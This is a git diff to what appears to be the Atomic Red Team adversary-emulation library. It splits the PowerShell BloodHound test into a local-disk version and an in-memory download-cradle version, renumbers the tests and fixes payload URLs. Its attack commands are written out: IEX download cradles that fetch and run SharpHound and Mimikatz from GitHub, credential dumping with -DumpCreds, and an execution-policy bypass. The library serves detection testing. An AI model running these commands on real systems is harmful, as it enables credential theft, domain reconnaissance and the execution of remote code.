diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index b4eeff18..2df4565f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -480,18 +480,19 @@ execution,T1170,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload Wi
execution,T1170,Mshta,2,Mshta executes VBScript to execute malicious command
execution,T1170,Mshta,3,Mshta Executes Remote HTML Application (HTA)
execution,T1086,PowerShell,1,Mimikatz
-execution,T1086,PowerShell,2,BloodHound
-execution,T1086,PowerShell,3,Obfuscation Tests
-execution,T1086,PowerShell,4,Mimikatz - Cradlecraft PsSendKeys
-execution,T1086,PowerShell,5,Invoke-AppPathBypass
-execution,T1086,PowerShell,6,Powershell MsXml COM object - no prompt
-execution,T1086,PowerShell,7,Powershell MsXml COM object - with prompt
-execution,T1086,PowerShell,8,Powershell XML requests
-execution,T1086,PowerShell,9,Powershell invoke mshta.exe download
-execution,T1086,PowerShell,10,Powershell Invoke-DownloadCradle
-execution,T1086,PowerShell,11,PowerShell Fileless Script Execution
-execution,T1086,PowerShell,12,PowerShell Downgrade Attack
-execution,T1086,PowerShell,13,NTFS Alternate Data Stream Access
+execution,T1086,PowerShell,2,Run BloodHound from local disk
+execution,T1086,PowerShell,3,Run Bloodhound from Memory using Download Cradle
+execution,T1086,PowerShell,4,Obfuscation Tests
+execution,T1086,PowerShell,5,Mimikatz - Cradlecraft PsSendKeys
+execution,T1086,PowerShell,6,Invoke-AppPathBypass
+execution,T1086,PowerShell,7,Powershell MsXml COM object - no prompt
+execution,T1086,PowerShell,8,Powershell MsXml COM object - with prompt
+execution,T1086,PowerShell,9,Powershell XML requests
+execution,T1086,PowerShell,10,Powershell invoke mshta.exe download
+execution,T1086,PowerShell,11,Powershell Invoke-DownloadCradle
+execution,T1086,PowerShell,12,PowerShell Fileless Script Execution
+execution,T1086,PowerShell,13,PowerShell Downgrade Attack
+execution,T1086,PowerShell,14,NTFS Alternate Data Stream Access
execution,T1121,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test
execution,T1121,Regsvcs/Regasm,2,Regsvs Uninstall Method Call Test
execution,T1117,Regsvr32,1,Regsvr32 local COM scriptlet execution
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2861a766..fb4faf00 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -361,18 +361,19 @@ execution,T1170,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload Wi
execution,T1170,Mshta,2,Mshta executes VBScript to execute malicious command
execution,T1170,Mshta,3,Mshta Executes Remote HTML Application (HTA)
execution,T1086,PowerShell,1,Mimikatz
-execution,T1086,PowerShell,2,BloodHound
-execution,T1086,PowerShell,3,Obfuscation Tests
-execution,T1086,PowerShell,4,Mimikatz - Cradlecraft PsSendKeys
-execution,T1086,PowerShell,5,Invoke-AppPathBypass
-execution,T1086,PowerShell,6,Powershell MsXml COM object - no prompt
-execution,T1086,PowerShell,7,Powershell MsXml COM object - with prompt
-execution,T1086,PowerShell,8,Powershell XML requests
-execution,T1086,PowerShell,9,Powershell invoke mshta.exe download
-execution,T1086,PowerShell,10,Powershell Invoke-DownloadCradle
-execution,T1086,PowerShell,11,PowerShell Fileless Script Execution
-execution,T1086,PowerShell,12,PowerShell Downgrade Attack
-execution,T1086,PowerShell,13,NTFS Alternate Data Stream Access
+execution,T1086,PowerShell,2,Run BloodHound from local disk
+execution,T1086,PowerShell,3,Run Bloodhound from Memory using Download Cradle
+execution,T1086,PowerShell,4,Obfuscation Tests
+execution,T1086,PowerShell,5,Mimikatz - Cradlecraft PsSendKeys
+execution,T1086,PowerShell,6,Invoke-AppPathBypass
+execution,T1086,PowerShell,7,Powershell MsXml COM object - no prompt
+execution,T1086,PowerShell,8,Powershell MsXml COM object - with prompt
+execution,T1086,PowerShell,9,Powershell XML requests
+execution,T1086,PowerShell,10,Powershell invoke mshta.exe download
+execution,T1086,PowerShell,11,Powershell Invoke-DownloadCradle
+execution,T1086,PowerShell,12,PowerShell Fileless Script Execution
+execution,T1086,PowerShell,13,PowerShell Downgrade Attack
+execution,T1086,PowerShell,14,NTFS Alternate Data Stream Access
execution,T1121,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test
execution,T1121,Regsvcs/Regasm,2,Regsvs Uninstall Method Call Test
execution,T1117,Regsvr32,1,Regsvr32 local COM scriptlet execution
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 204b88c8..4dabd683 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -742,18 +742,19 @@
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
- [T1086 PowerShell](../../T1086/T1086.md)
- Atomic Test #1: Mimikatz [windows]
- - Atomic Test #2: BloodHound [windows]
- - Atomic Test #3: Obfuscation Tests [windows]
- - Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- - Atomic Test #5: Invoke-AppPathBypass [windows]
- - Atomic Test #6: Powershell MsXml COM object - no prompt [windows]
- - Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
- - Atomic Test #8: Powershell XML requests [windows]
- - Atomic Test #9: Powershell invoke mshta.exe download [windows]
- - Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- - Atomic Test #11: PowerShell Fileless Script Execution [windows]
- - Atomic Test #12: PowerShell Downgrade Attack [windows]
- - Atomic Test #13: NTFS Alternate Data Stream Access [windows]
+ - Atomic Test #2: Run BloodHound from local disk [windows]
+ - Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
+ - Atomic Test #4: Obfuscation Tests [windows]
+ - Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
+ - Atomic Test #6: Invoke-AppPathBypass [windows]
+ - Atomic Test #7: Powershell MsXml COM object - no prompt [windows]
+ - Atomic Test #8: Powershell MsXml COM object - with prompt [windows]
+ - Atomic Test #9: Powershell XML requests [windows]
+ - Atomic Test #10: Powershell invoke mshta.exe download [windows]
+ - Atomic Test #11: Powershell Invoke-DownloadCradle [windows]
+ - Atomic Test #12: PowerShell Fileless Script Execution [windows]
+ - Atomic Test #13: PowerShell Downgrade Attack [windows]
+ - Atomic Test #14: NTFS Alternate Data Stream Access [windows]
- [T1121 Regsvcs/Regasm](../../T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 3597e714..d0365182 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -616,18 +616,19 @@
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
- [T1086 PowerShell](../../T1086/T1086.md)
- Atomic Test #1: Mimikatz [windows]
- - Atomic Test #2: BloodHound [windows]
- - Atomic Test #3: Obfuscation Tests [windows]
- - Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- - Atomic Test #5: Invoke-AppPathBypass [windows]
- - Atomic Test #6: Powershell MsXml COM object - no prompt [windows]
- - Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
- - Atomic Test #8: Powershell XML requests [windows]
- - Atomic Test #9: Powershell invoke mshta.exe download [windows]
- - Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- - Atomic Test #11: PowerShell Fileless Script Execution [windows]
- - Atomic Test #12: PowerShell Downgrade Attack [windows]
- - Atomic Test #13: NTFS Alternate Data Stream Access [windows]
+ - Atomic Test #2: Run BloodHound from local disk [windows]
+ - Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
+ - Atomic Test #4: Obfuscation Tests [windows]
+ - Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
+ - Atomic Test #6: Invoke-AppPathBypass [windows]
+ - Atomic Test #7: Powershell MsXml COM object - no prompt [windows]
+ - Atomic Test #8: Powershell MsXml COM object - with prompt [windows]
+ - Atomic Test #9: Powershell XML requests [windows]
+ - Atomic Test #10: Powershell invoke mshta.exe download [windows]
+ - Atomic Test #11: Powershell Invoke-DownloadCradle [windows]
+ - Atomic Test #12: PowerShell Fileless Script Execution [windows]
+ - Atomic Test #13: PowerShell Downgrade Attack [windows]
+ - Atomic Test #14: NTFS Alternate Data Stream Access [windows]
- [T1121 Regsvcs/Regasm](../../T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index e291ac39..1049acad 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -23332,26 +23332,67 @@ execution:
Invoke-Mimikatz -DumpCreds"
'
- - name: BloodHound
- description: |
- Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run,
-
- and then compress and store the data to the temp directory on the machine
+ - name: Run BloodHound from local disk
+ description: "Upon execution SharpHound will be downloaded to disk, imported
+ and executed. It will set up collection methods, run and then compress and
+ store the data to the temp directory on the machine. If system is unable to
+ contact a domain, proper execution will not occur.\n\nSuccessful execution
+ will produce stdout reporting LDAP connection was successful and BloodHound
+ domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip
+ file. \n"
supported_platforms:
- windows
input_arguments:
- bloodurl:
- description: BloodHound URL
- type: url
- default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1
+ internal_domain:
+ description: Specify internal domain name to analyze
+ type: string
+ default: windomain.local
+ file_path:
+ description: File path for SharpHound payload
+ type: String
+ default: PathToAtomicsFolder\T1086\src
+ output_path:
+ description: Output path for BloodHound reports
+ type: String
+ default: PathToAtomicsFolder\T1086\src
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Validate if SharpHound.ps1 is located in #{file_path}.'
+ prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else
+ {exit 1}'
+ get_prereq_command: Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1"
+ -OutFile "#{file_path}\SharpHound.ps1"
executor:
name: powershell
elevation_required: false
- command: 'IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
- Invoke-BloodHound
-
-'
- cleanup_command: 'Remove-Item $env:temp\*BloodHound.zip -Force
+ command: "write-host \"Import and Execution of SharpHound.ps1 from #{file_path}\"
+ -ForegroundColor Cyan\nimport-module #{file_path}\\SharpHound.ps1; invoke-bloodhound
+ -domain #{internal_domain} -OutputDirectory #{output_path}\n \n"
+ cleanup_command: |
+ Remove-Item #{file_path}\SharpHound.ps1 -Force
+ Remove-Item #{file_path}\*BloodHound.zip -Force
+ - name: Run Bloodhound from Memory using Download Cradle
+ description: "Upon execution SharpHound will load into memory and execute against
+ a domain. It will set up collection methods, run and then compress and store
+ the data to #{output_path}. If system is unable to contact a domain, proper
+ execution will not occur.\n\nSuccessful execution will produce stdout reporting
+ LDAP connection was successful and BloodHound domain enumeration is occurring.
+ Upon completion, final output will be a *BloodHound.zip file. \n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_path:
+ description: Output path for BloodHound reports
+ type: String
+ default: PathToAtomicsFolder\T1086\src
+ executor:
+ name: powershell
+ elevation_required: false
+ command: "write-host \"Remote download of SharpHound.ps1, import and execution
+ from $env:temp\" -ForegroundColor Cyan\npowershell -exec Bypass -C \"IEX(New-Object
+ Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');Invoke-BloodHound
+ -OutputDirectory #{output_path}\"\n \n"
+ cleanup_command: 'Remove-Item #{output_path}\*BloodHound.zip -Force
'
- name: Obfuscation Tests
@@ -23416,7 +23457,7 @@ execution:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1
executor:
name: command_prompt
elevation_required: false
@@ -23429,14 +23470,14 @@ execution:
description: |
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
- Provided by https://github.com/mgreen27/mgreen27.github.i
+ Provided by https://github.com/mgreen27/mgreen27.github.io
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1
executor:
name: command_prompt
elevation_required: false
@@ -23456,7 +23497,7 @@ execution:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.xml
executor:
name: command_prompt
elevation_required: false
@@ -23476,7 +23517,7 @@ execution:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/mshta.sct
executor:
name: command_prompt
elevation_required: false
diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md
index 1b033cff..fb874225 100644
--- a/atomics/T1086/T1086.md
+++ b/atomics/T1086/T1086.md
@@ -14,29 +14,31 @@ PowerShell commands/scripts can also be executed without directly invoking the p
- [Atomic Test #1 - Mimikatz](#atomic-test-1---mimikatz)
-- [Atomic Test #2 - BloodHound](#atomic-test-2---bloodhound)
+- [Atomic Test #2 - Run BloodHound from local disk](#atomic-test-2---run-bloodhound-from-local-disk)
-- [Atomic Test #3 - Obfuscation Tests](#atomic-test-3---obfuscation-tests)
+- [Atomic Test #3 - Run Bloodhound from Memory using Download Cradle](#atomic-test-3---run-bloodhound-from-memory-using-download-cradle)
-- [Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys](#atomic-test-4---mimikatz---cradlecraft-pssendkeys)
+- [Atomic Test #4 - Obfuscation Tests](#atomic-test-4---obfuscation-tests)
-- [Atomic Test #5 - Invoke-AppPathBypass](#atomic-test-5---invoke-apppathbypass)
+- [Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys](#atomic-test-5---mimikatz---cradlecraft-pssendkeys)
-- [Atomic Test #6 - Powershell MsXml COM object - no prompt](#atomic-test-6---powershell-msxml-com-object---no-prompt)
+- [Atomic Test #6 - Invoke-AppPathBypass](#atomic-test-6---invoke-apppathbypass)
-- [Atomic Test #7 - Powershell MsXml COM object - with prompt](#atomic-test-7---powershell-msxml-com-object---with-prompt)
+- [Atomic Test #7 - Powershell MsXml COM object - no prompt](#atomic-test-7---powershell-msxml-com-object---no-prompt)
-- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests)
+- [Atomic Test #8 - Powershell MsXml COM object - with prompt](#atomic-test-8---powershell-msxml-com-object---with-prompt)
-- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download)
+- [Atomic Test #9 - Powershell XML requests](#atomic-test-9---powershell-xml-requests)
-- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
+- [Atomic Test #10 - Powershell invoke mshta.exe download](#atomic-test-10---powershell-invoke-mshtaexe-download)
-- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution)
+- [Atomic Test #11 - Powershell Invoke-DownloadCradle](#atomic-test-11---powershell-invoke-downloadcradle)
-- [Atomic Test #12 - PowerShell Downgrade Attack](#atomic-test-12---powershell-downgrade-attack)
+- [Atomic Test #12 - PowerShell Fileless Script Execution](#atomic-test-12---powershell-fileless-script-execution)
-- [Atomic Test #13 - NTFS Alternate Data Stream Access](#atomic-test-13---ntfs-alternate-data-stream-access)
+- [Atomic Test #13 - PowerShell Downgrade Attack](#atomic-test-13---powershell-downgrade-attack)
+
+- [Atomic Test #14 - NTFS Alternate Data Stream Access](#atomic-test-14---ntfs-alternate-data-stream-access)
@@ -70,10 +72,10 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invo
-## Atomic Test #2 - BloodHound
-Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run,
+## Atomic Test #2 - Run BloodHound from local disk
+Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
-and then compress and store the data to the temp directory on the machine
+Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
**Supported Platforms:** Windows
@@ -83,19 +85,71 @@ and then compress and store the data to the temp directory on the machine
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1|
+| internal_domain | Specify internal domain name to analyze | string | windomain.local|
+| file_path | File path for SharpHound payload | String | PathToAtomicsFolder\T1086\src|
+| output_path | Output path for BloodHound reports | String | PathToAtomicsFolder\T1086\src|
#### Attack Commands: Run with `powershell`!
```powershell
-IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
+write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
+import-module #{file_path}\SharpHound.ps1; invoke-bloodhound -domain #{internal_domain} -OutputDirectory #{output_path}
```
#### Cleanup Commands:
```powershell
-Remove-Item $env:temp\*BloodHound.zip -Force
+Remove-Item #{file_path}\SharpHound.ps1 -Force
+Remove-Item #{file_path}\*BloodHound.zip -Force
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Validate if SharpHound.ps1 is located in #{file_path}.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1"
+```
+
+
+
+
+
+
+
+## Atomic Test #3 - Run Bloodhound from Memory using Download Cradle
+Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to #{output_path}. If system is unable to contact a domain, proper execution will not occur.
+
+Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_path | Output path for BloodHound reports | String | PathToAtomicsFolder\T1086\src|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+write-host "Remote download of SharpHound.ps1, import and execution from $env:temp" -ForegroundColor Cyan
+powershell -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');Invoke-BloodHound -OutputDirectory #{output_path}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item #{output_path}\*BloodHound.zip -Force
```
@@ -105,7 +159,7 @@ Remove-Item $env:temp\*BloodHound.zip -Force
-## Atomic Test #3 - Obfuscation Tests
+## Atomic Test #4 - Obfuscation Tests
Different obfuscated methods to test
Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
@@ -132,7 +186,7 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
-## Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys
+## Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys
Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
**Supported Platforms:** Windows
@@ -156,7 +210,7 @@ $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b10
-## Atomic Test #5 - Invoke-AppPathBypass
+## Atomic Test #6 - Invoke-AppPathBypass
Note: Windows 10 only
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Upon execution windows backup and restore window will be opened
@@ -182,7 +236,7 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
-## Atomic Test #6 - Powershell MsXml COM object - no prompt
+## Atomic Test #7 - Powershell MsXml COM object - no prompt
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
@@ -195,7 +249,7 @@ Not proxy aware removing cache although does not appear to write to those locati
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1|
#### Attack Commands: Run with `command_prompt`!
@@ -213,10 +267,10 @@ powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Ob
-## Atomic Test #7 - Powershell MsXml COM object - with prompt
+## Atomic Test #8 - Powershell MsXml COM object - with prompt
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
-Provided by https://github.com/mgreen27/mgreen27.github.i
+Provided by https://github.com/mgreen27/mgreen27.github.io
**Supported Platforms:** Windows
@@ -226,7 +280,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.i
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1|
#### Attack Commands: Run with `command_prompt`!
@@ -244,7 +298,7 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
-## Atomic Test #8 - Powershell XML requests
+## Atomic Test #9 - Powershell XML requests
Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -257,7 +311,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.xml|
#### Attack Commands: Run with `command_prompt`!
@@ -275,7 +329,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
-## Atomic Test #9 - Powershell invoke mshta.exe download
+## Atomic Test #10 - Powershell invoke mshta.exe download
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -288,7 +342,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/mshta.sct|
#### Attack Commands: Run with `command_prompt`!
@@ -306,7 +360,7 @@ C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}'
-## Atomic Test #10 - Powershell Invoke-DownloadCradle
+## Atomic Test #11 - Powershell Invoke-DownloadCradle
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
@@ -328,7 +382,7 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
-## Atomic Test #11 - PowerShell Fileless Script Execution
+## Atomic Test #12 - PowerShell Fileless Script Execution
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that
art-marker.txt is in the folder.
@@ -360,7 +414,7 @@ Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
-## Atomic Test #12 - PowerShell Downgrade Attack
+## Atomic Test #13 - PowerShell Downgrade Attack
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
**Supported Platforms:** Windows
@@ -396,7 +450,7 @@ Write-Host Automated installer not implemented yet, please install PowerShell v
-## Atomic Test #13 - NTFS Alternate Data Stream Access
+## Atomic Test #14 - NTFS Alternate Data Stream Access
Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
**Supported Platforms:** Windows
diff --git a/atomics/T1086/T1086.yaml b/atomics/T1086/T1086.yaml
index 0ce5c5f5..520054f6 100644
--- a/atomics/T1086/T1086.yaml
+++ b/atomics/T1086/T1086.yaml
@@ -19,25 +19,68 @@ atomic_tests:
command: |
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
-- name: BloodHound
+- name: Run BloodHound from local disk
description: |
- Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run,
+ Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
- and then compress and store the data to the temp directory on the machine
+ Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
supported_platforms:
- windows
input_arguments:
- bloodurl:
- description: BloodHound URL
- type: url
- default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1
+ internal_domain:
+ description: Specify internal domain name to analyze
+ type: string
+ default: windomain.local
+ file_path:
+ description: File path for SharpHound payload
+ type: String
+ default: PathToAtomicsFolder\T1086\src
+ output_path:
+ description: Output path for BloodHound reports
+ type: String
+ default: PathToAtomicsFolder\T1086\src
+
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Validate if SharpHound.ps1 is located in #{file_path}.
+ prereq_command: |
+ if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1"
+
executor:
name: powershell
elevation_required: false
command: |
- IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
+ write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
+ import-module #{file_path}\SharpHound.ps1; invoke-bloodhound -domain #{internal_domain} -OutputDirectory #{output_path}
+
cleanup_command: |
- Remove-Item $env:temp\*BloodHound.zip -Force
+ Remove-Item #{file_path}\SharpHound.ps1 -Force
+ Remove-Item #{file_path}\*BloodHound.zip -Force
+
+- name: Run Bloodhound from Memory using Download Cradle
+ description: |
+ Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to #{output_path}. If system is unable to contact a domain, proper execution will not occur.
+
+ Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
+ supported_platforms:
+ - windows
+ input_arguments:
+ output_path:
+ description: Output path for BloodHound reports
+ type: String
+ default: PathToAtomicsFolder\T1086\src
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ write-host "Remote download of SharpHound.ps1, import and execution from $env:temp" -ForegroundColor Cyan
+ powershell -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');Invoke-BloodHound -OutputDirectory #{output_path}"
+
+ cleanup_command: |
+ Remove-Item #{output_path}\*BloodHound.zip -Force
- name: Obfuscation Tests
description: |
@@ -88,7 +131,7 @@ atomic_tests:
url:
description: url of payload to execute
type: url
- default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1
executor:
name: command_prompt
elevation_required: false
@@ -99,14 +142,14 @@ atomic_tests:
description: |
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
- Provided by https://github.com/mgreen27/mgreen27.github.i
+ Provided by https://github.com/mgreen27/mgreen27.github.io
supported_platforms:
